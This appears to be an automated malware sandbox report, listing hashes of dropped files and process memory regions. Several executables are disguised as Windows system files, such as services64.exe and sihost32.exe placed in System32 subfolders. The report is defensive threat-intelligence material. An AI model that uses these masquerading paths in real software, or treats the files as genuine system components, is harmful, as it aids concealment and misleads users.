C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
cebdc67bea62d6a8044be731a9375c13
SHA17728d2eab6d295f32ae1bb24f23b8813e28f012b
SHA256263f5eaed9c0c1774971bf79ed38600a0dc2bf4d4b70a0ecdd39dee71b2a5960
SHA512c31d50bd1c5cff7f7111cf442f8e355137104fbd93d3566a0b0623602d6d0b03c5924cc36fb830935a10f0e81a50bce09b12892be0d9d174e8061de31314b5d2
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
cebdc67bea62d6a8044be731a9375c13
SHA17728d2eab6d295f32ae1bb24f23b8813e28f012b
SHA256263f5eaed9c0c1774971bf79ed38600a0dc2bf4d4b70a0ecdd39dee71b2a5960
SHA512c31d50bd1c5cff7f7111cf442f8e355137104fbd93d3566a0b0623602d6d0b03c5924cc36fb830935a10f0e81a50bce09b12892be0d9d174e8061de31314b5d2
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
cebdc67bea62d6a8044be731a9375c13
SHA17728d2eab6d295f32ae1bb24f23b8813e28f012b
SHA256263f5eaed9c0c1774971bf79ed38600a0dc2bf4d4b70a0ecdd39dee71b2a5960
SHA512c31d50bd1c5cff7f7111cf442f8e355137104fbd93d3566a0b0623602d6d0b03c5924cc36fb830935a10f0e81a50bce09b12892be0d9d174e8061de31314b5d2
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
7f1fa94404121ed46d41e4f7e7e4db36
SHA149f0873590a70b74cba6d802c093b5d82991ea63
SHA25643d92d93f604d101bb1843c2f52476de96016fda99f8d8b9e0e544a180750b8e
SHA51211a3ea134cd39ae62bddd2a3a80136089949fb8480d0acac1df3071ee35435efd3dcdf7962a871d7445e1505f92e12ec5a6c958fba5eb9c5f65d31940a1bc928
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
7f1fa94404121ed46d41e4f7e7e4db36
SHA149f0873590a70b74cba6d802c093b5d82991ea63
SHA25643d92d93f604d101bb1843c2f52476de96016fda99f8d8b9e0e544a180750b8e
SHA51211a3ea134cd39ae62bddd2a3a80136089949fb8480d0acac1df3071ee35435efd3dcdf7962a871d7445e1505f92e12ec5a6c958fba5eb9c5f65d31940a1bc928
-
C:\Windows\System32\Microsoft\Libs\sihost64.exeMD5
ab0e8cd9d9374369b972868842a74471
SHA1d457b0f8ba1b3d1bd98fae16ea36a46ae04013a3
SHA256873b123e6c5909c6a08f02649d7a47b172851f3b8e28a670a2ced2b4f8b036ea
SHA51291d56a14ca18e316033cd938fbcdd48faa83ff8964185c2db9fbacdb200aab8c863c17c066f25e05afcd87746dc5909ecf59cfdb2920fb95528a5735d09c9afb
-
C:\Windows\System32\Microsoft\Telemetry\sihost32.exeMD5
5f4c60a6e2549d64a7d9e9c6053d385a
SHA123862358b97ea62cfb4dd5648b3e9b827e6886a4
SHA256145a18732aa1c09bf0a1e79193bed6c6d0fb51b7825c67828616fffe8d359e3d
SHA512a427ca2b789a07e332893e16ba1caaa9424fd03343d64288a0c1dab558a637f80f013aa0496a575630c39a395c6074791875be77450caab2189d88f6fbf99f2d
-
C:\Windows\System32\services32.exeMD5
3dddbab9fbf93ab3dbe8c3eebb783472
SHA1aa54ca975e692d541cd7b37054fbc343aba7906e
SHA256e6315f3eb516284f6bdbb69680f5a4ff2ab4ddc6f93e1937830cccbeaa99d038
SHA5128eae2168273a675725df6711dab6519e5787688268a7e9f0a5a80dd15bed77951619e274abb5d228b84bd527646b414e345781a4f8c743551b8532d9c6eaa5b8
-
C:\Windows\System32\services64.exeMD5
f87ec0d92f1e1c57e281c3b7207264a4
SHA1452ee705af24c36bb2235fc969dd122ede448e7b
SHA2565e5c5c47ac45012b8fe6c40877d111d17b1ae3108fb1bb6ff4ab6e154d256f1c
SHA5128e141c0a78dadafc241a70b1298fd35e223c18eaecceb7ea17bba05c4626e40e5c578757e0510a4db23f99dfb7439371f2ec6fe25252c50f4e3e89b30be37052
-
C:\Windows\system32\services32.exeMD5
3dddbab9fbf93ab3dbe8c3eebb783472
SHA1aa54ca975e692d541cd7b37054fbc343aba7906e
SHA256e6315f3eb516284f6bdbb69680f5a4ff2ab4ddc6f93e1937830cccbeaa99d038
SHA5128eae2168273a675725df6711dab6519e5787688268a7e9f0a5a80dd15bed77951619e274abb5d228b84bd527646b414e345781a4f8c743551b8532d9c6eaa5b8
-
C:\Windows\system32\services64.exeMD5
32983f1467c3dd7929cf8bbea4a3d5a5
SHA1cf0eecf894019e5047599e06e17c063b06811bfa
SHA2563f9a19599b4e025c9ad0e8d204cccc495a486180bb73bc85048494e56bc2d010
SHA512cb702eca80b7017531deb1d327f840710afe65913dc4bdd2ef8ba1a61bd1ebc4dbac0aa80c8d5099173ef7a95160fbfa8527df6620aa3a457dbed9d6768437df
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\Users\Admin\AppData\Local\Temp\Datafile32.exeMD5
3dddbab9fbf93ab3dbe8c3eebb783472
SHA1aa54ca975e692d541cd7b37054fbc343aba7906e
SHA256e6315f3eb516284f6bdbb69680f5a4ff2ab4ddc6f93e1937830cccbeaa99d038
SHA5128eae2168273a675725df6711dab6519e5787688268a7e9f0a5a80dd15bed77951619e274abb5d228b84bd527646b414e345781a4f8c743551b8532d9c6eaa5b8
-
\Users\Admin\AppData\Local\Temp\Datafile64.exeMD5
f87ec0d92f1e1c57e281c3b7207264a4
SHA1452ee705af24c36bb2235fc969dd122ede448e7b
SHA2565e5c5c47ac45012b8fe6c40877d111d17b1ae3108fb1bb6ff4ab6e154d256f1c
SHA5128e141c0a78dadafc241a70b1298fd35e223c18eaecceb7ea17bba05c4626e40e5c578757e0510a4db23f99dfb7439371f2ec6fe25252c50f4e3e89b30be37052
-
\Users\Admin\AppData\Local\Temp\Server32.exeMD5
7066ed03efd072ba5c0d9479c4dd23c1
SHA1064dfe6c112b419a5822c2fc3d5cdcc296f76fae
SHA256fe528fc9917783284421b45f302fc62f5058d40a9156fabeed1f7771478b24c8
SHA512e0d9684809b32046ef115c1cdb851d00d0d31be6a79219e656b4c7a42ad690d1a6f60049a9589261e03198c07532db5ed1500128ab4c3c9f60c228c13d03e10b
-
\Windows\System32\Microsoft\Libs\sihost64.exeMD5
ab0e8cd9d9374369b972868842a74471
SHA1d457b0f8ba1b3d1bd98fae16ea36a46ae04013a3
SHA256873b123e6c5909c6a08f02649d7a47b172851f3b8e28a670a2ced2b4f8b036ea
SHA51291d56a14ca18e316033cd938fbcdd48faa83ff8964185c2db9fbacdb200aab8c863c17c066f25e05afcd87746dc5909ecf59cfdb2920fb95528a5735d09c9afb
-
\Windows\System32\Microsoft\Telemetry\sihost32.exeMD5
5f4c60a6e2549d64a7d9e9c6053d385a
SHA123862358b97ea62cfb4dd5648b3e9b827e6886a4
SHA256145a18732aa1c09bf0a1e79193bed6c6d0fb51b7825c67828616fffe8d359e3d
SHA512a427ca2b789a07e332893e16ba1caaa9424fd03343d64288a0c1dab558a637f80f013aa0496a575630c39a395c6074791875be77450caab2189d88f6fbf99f2d
-
\Windows\System32\services32.exeMD5
3dddbab9fbf93ab3dbe8c3eebb783472
SHA1aa54ca975e692d541cd7b37054fbc343aba7906e
SHA256e6315f3eb516284f6bdbb69680f5a4ff2ab4ddc6f93e1937830cccbeaa99d038
SHA5128eae2168273a675725df6711dab6519e5787688268a7e9f0a5a80dd15bed77951619e274abb5d228b84bd527646b414e345781a4f8c743551b8532d9c6eaa5b8
-
\Windows\System32\services64.exeMD5
f87ec0d92f1e1c57e281c3b7207264a4
SHA1452ee705af24c36bb2235fc969dd122ede448e7b
SHA2565e5c5c47ac45012b8fe6c40877d111d17b1ae3108fb1bb6ff4ab6e154d256f1c
SHA5128e141c0a78dadafc241a70b1298fd35e223c18eaecceb7ea17bba05c4626e40e5c578757e0510a4db23f99dfb7439371f2ec6fe25252c50f4e3e89b30be37052
-
memory/484-54-0x00000000757B1000-0x00000000757B3000-memory.dmpFilesize
8KB
-
memory/484-57-0x0000000000C00000-0x0000000000C01000-memory.dmpFilesize
4KB
-
memory/484-59-0x00000000054E0000-0x00000000054E1000-memory.dmpFilesize
4KB
-
memory/528-213-0x00000000028AB000-0x00000000028CA000-memory.dmpFilesize
124KB
-
memory/528-210-0x00000000028A0000-0x00000000028A2000-memory.dmpFilesize
8KB
-
memory/528-208-0x000007FEECA90000-0x000007FEED5ED000-memory.dmpFilesize
11.4MB
-
memory/528-197-0x0000000000000000-mapping.dmp
-
memory/528-211-0x00000000028A2000-0x00000000028A4000-memory.dmpFilesize
8KB
-
memory/528-212-0x00000000028A4000-0x00000000028A7000-memory.dmpFilesize
12KB
-
memory/840-106-0x00000000024B2000-0x00000000024B4000-memory.dmpFilesize
8KB
-
memory/840-107-0x000007FEED4C0000-0x000007FEEE01D000-memory.dmpFilesize
11.4MB
-
memory/840-103-0x00000000024B0000-0x00000000024B2000-memory.dmpFilesize
8KB
-
memory/840-93-0x0000000000000000-mapping.dmp
-
memory/840-112-0x00000000024B4000-0x00000000024B7000-memory.dmpFilesize
12KB
-
memory/840-120-0x00000000024BB000-0x00000000024DA000-memory.dmpFilesize
124KB
-
memory/872-67-0x0000000000400000-0x0000000000E48000-memory.dmpFilesize
10.3MB
-
memory/872-66-0x0000000000401000-0x0000000000403000-memory.dmpFilesize
8KB
-
memory/872-61-0x0000000000000000-mapping.dmp
-
memory/924-192-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/924-183-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/924-167-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/924-224-0x0000000000690000-0x00000000006B0000-memory.dmpFilesize
128KB
-
memory/924-223-0x0000000000670000-0x0000000000690000-memory.dmpFilesize
128KB
-
memory/924-170-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/924-172-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/924-175-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/924-178-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/924-181-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/924-184-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/924-185-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/924-198-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/924-196-0x0000000000070000-0x0000000000090000-memory.dmpFilesize
128KB
-
memory/924-186-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/924-194-0x000000014030F3F8-mapping.dmp
-
memory/924-187-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/924-189-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/988-73-0x0000000000360000-0x000000000038E000-memory.dmpFilesize
184KB
-
memory/988-83-0x0000000004D54000-0x0000000004D55000-memory.dmpFilesize
4KB
-
memory/988-82-0x0000000004D52000-0x0000000004D53000-memory.dmpFilesize
4KB
-
memory/988-81-0x0000000004D51000-0x0000000004D52000-memory.dmpFilesize
4KB
-
memory/988-79-0x0000000001EC0000-0x0000000001ED9000-memory.dmpFilesize
100KB
-
memory/988-70-0x0000000000000000-mapping.dmp
-
memory/1008-91-0x0000000000000000-mapping.dmp
-
memory/1152-86-0x000000001B540000-0x000000001B75E000-memory.dmpFilesize
2.1MB
-
memory/1152-85-0x00000000000A0000-0x00000000002C2000-memory.dmpFilesize
2.1MB
-
memory/1152-99-0x000000001B2A6000-0x000000001B2A7000-memory.dmpFilesize
4KB
-
memory/1152-110-0x000000001B2A7000-0x000000001B2A8000-memory.dmpFilesize
4KB
-
memory/1152-94-0x000000001B2A2000-0x000000001B2A4000-memory.dmpFilesize
8KB
-
memory/1152-98-0x000000001B2A4000-0x000000001B2A6000-memory.dmpFilesize
8KB
-
memory/1168-173-0x0000000002890000-0x0000000002892000-memory.dmpFilesize
8KB
-
memory/1168-177-0x000000000289B000-0x00000000028BA000-memory.dmpFilesize
124KB
-
memory/1168-176-0x0000000002894000-0x0000000002897000-memory.dmpFilesize
12KB
-
memory/1168-174-0x0000000002892000-0x0000000002894000-memory.dmpFilesize
8KB
-
memory/1168-154-0x0000000000000000-mapping.dmp
-
memory/1168-162-0x000007FEECA90000-0x000007FEED5ED000-memory.dmpFilesize
11.4MB
-
memory/1288-233-0x0000000000060000-0x0000000000066000-memory.dmpFilesize
24KB
-
memory/1288-235-0x000000001AD22000-0x000000001AD24000-memory.dmpFilesize
8KB
-
memory/1288-234-0x00000000001D0000-0x00000000001D3000-memory.dmpFilesize
12KB
-
memory/1404-87-0x000000001B290000-0x000000001B47E000-memory.dmpFilesize
1.9MB
-
memory/1404-109-0x000000001ABD6000-0x000000001ABD7000-memory.dmpFilesize
4KB
-
memory/1404-96-0x000000001ABD2000-0x000000001ABD4000-memory.dmpFilesize
8KB
-
memory/1404-84-0x0000000000230000-0x0000000000422000-memory.dmpFilesize
1.9MB
-
memory/1404-111-0x000000001ABD7000-0x000000001ABD8000-memory.dmpFilesize
4KB
-
memory/1404-108-0x000000001ABD4000-0x000000001ABD6000-memory.dmpFilesize
8KB
-
memory/1408-147-0x0000000000000000-mapping.dmp
-
memory/1408-150-0x0000000000400000-0x0000000000E48000-memory.dmpFilesize
10.3MB
-
memory/1444-100-0x000007FEED4C0000-0x000007FEEE01D000-memory.dmpFilesize
11.4MB
-
memory/1444-105-0x0000000002754000-0x0000000002757000-memory.dmpFilesize
12KB
-
memory/1444-126-0x000000000275B000-0x000000000277A000-memory.dmpFilesize
124KB
-
memory/1444-117-0x000000001B860000-0x000000001BB5F000-memory.dmpFilesize
3.0MB
-
memory/1444-102-0x0000000002750000-0x0000000002752000-memory.dmpFilesize
8KB
-
memory/1444-92-0x0000000000000000-mapping.dmp
-
memory/1444-95-0x000007FEFB951000-0x000007FEFB953000-memory.dmpFilesize
8KB
-
memory/1444-104-0x0000000002752000-0x0000000002754000-memory.dmpFilesize
8KB
-
memory/1492-127-0x000000000228B000-0x00000000022AA000-memory.dmpFilesize
124KB
-
memory/1492-118-0x0000000000000000-mapping.dmp
-
memory/1492-124-0x0000000002282000-0x0000000002284000-memory.dmpFilesize
8KB
-
memory/1492-125-0x0000000002284000-0x0000000002287000-memory.dmpFilesize
12KB
-
memory/1492-123-0x0000000002280000-0x0000000002282000-memory.dmpFilesize
8KB
-
memory/1492-122-0x000007FEED4C0000-0x000007FEEE01D000-memory.dmpFilesize
11.4MB
-
memory/1576-207-0x0000000000000000-mapping.dmp
-
memory/1592-164-0x0000000000000000-mapping.dmp
-
memory/1604-220-0x000000000281B000-0x000000000283A000-memory.dmpFilesize
124KB
-
memory/1604-214-0x0000000000000000-mapping.dmp
-
memory/1604-217-0x000007FEF24A0000-0x000007FEF2FFD000-memory.dmpFilesize
11.4MB
-
memory/1604-218-0x000000001B7B0000-0x000000001BAAF000-memory.dmpFilesize
3.0MB
-
memory/1604-219-0x0000000002810000-0x0000000002812000-memory.dmpFilesize
8KB
-
memory/1604-221-0x0000000002812000-0x0000000002814000-memory.dmpFilesize
8KB
-
memory/1604-222-0x0000000002814000-0x0000000002817000-memory.dmpFilesize
12KB
-
memory/1636-116-0x0000000000000000-mapping.dmp
-
memory/1652-193-0x0000000000000000-mapping.dmp
-
memory/1656-128-0x0000000000000000-mapping.dmp
-
memory/1656-132-0x000007FEED4C0000-0x000007FEEE01D000-memory.dmpFilesize
11.4MB
-
memory/1656-135-0x00000000025C4000-0x00000000025C7000-memory.dmpFilesize
12KB
-
memory/1656-134-0x00000000025C2000-0x00000000025C4000-memory.dmpFilesize
8KB
-
memory/1656-133-0x00000000025C0000-0x00000000025C2000-memory.dmpFilesize
8KB
-
memory/1656-136-0x00000000025CB000-0x00000000025EA000-memory.dmpFilesize
124KB
-
memory/1668-90-0x0000000000000000-mapping.dmp
-
memory/1676-145-0x0000000000000000-mapping.dmp
-
memory/1684-202-0x0000000002117000-0x0000000002118000-memory.dmpFilesize
4KB
-
memory/1684-201-0x0000000002116000-0x0000000002117000-memory.dmpFilesize
4KB
-
memory/1684-200-0x0000000002114000-0x0000000002116000-memory.dmpFilesize
8KB
-
memory/1684-199-0x0000000002112000-0x0000000002114000-memory.dmpFilesize
8KB
-
memory/1732-225-0x00000000001D0000-0x00000000001D3000-memory.dmpFilesize
12KB
-
memory/1732-232-0x0000000002177000-0x0000000002178000-memory.dmpFilesize
4KB
-
memory/1732-231-0x0000000002176000-0x0000000002177000-memory.dmpFilesize
4KB
-
memory/1732-230-0x0000000002174000-0x0000000002176000-memory.dmpFilesize
8KB
-
memory/1732-228-0x0000000000060000-0x0000000000066000-memory.dmpFilesize
24KB
-
memory/1732-229-0x0000000002172000-0x0000000002174000-memory.dmpFilesize
8KB
-
memory/1748-113-0x0000000000000000-mapping.dmp
-
memory/1752-182-0x0000000002754000-0x0000000002757000-memory.dmpFilesize
12KB
-
memory/1752-188-0x000000001B760000-0x000000001BA5F000-memory.dmpFilesize
3.0MB
-
memory/1752-171-0x000007FEECA90000-0x000007FEED5ED000-memory.dmpFilesize
11.4MB
-
memory/1752-180-0x0000000002752000-0x0000000002754000-memory.dmpFilesize
8KB
-
memory/1752-179-0x0000000002750000-0x0000000002752000-memory.dmpFilesize
8KB
-
memory/1752-166-0x0000000000000000-mapping.dmp
-
memory/1752-195-0x000000000275B000-0x000000000277A000-memory.dmpFilesize
124KB
-
memory/1760-158-0x00000000023C7000-0x00000000023C8000-memory.dmpFilesize
4KB
-
memory/1760-155-0x00000000023C2000-0x00000000023C4000-memory.dmpFilesize
8KB
-
memory/1760-157-0x00000000023C6000-0x00000000023C7000-memory.dmpFilesize
4KB
-
memory/1760-156-0x00000000023C4000-0x00000000023C6000-memory.dmpFilesize
8KB
-
memory/1764-115-0x0000000000000000-mapping.dmp
-
memory/1792-139-0x0000000000000000-mapping.dmp
-
memory/1800-144-0x0000000000400000-0x0000000000EAE000-memory.dmpFilesize
10.7MB
-
memory/1800-141-0x0000000000000000-mapping.dmp
-
memory/1908-114-0x0000000000000000-mapping.dmp
-
memory/1944-68-0x0000000000401000-0x0000000000403000-memory.dmpFilesize
8KB
-
memory/1944-72-0x0000000000400000-0x0000000000EAE000-memory.dmpFilesize
10.7MB
-
memory/1944-64-0x0000000000000000-mapping.dmp
-
memory/1984-153-0x0000000000000000-mapping.dmp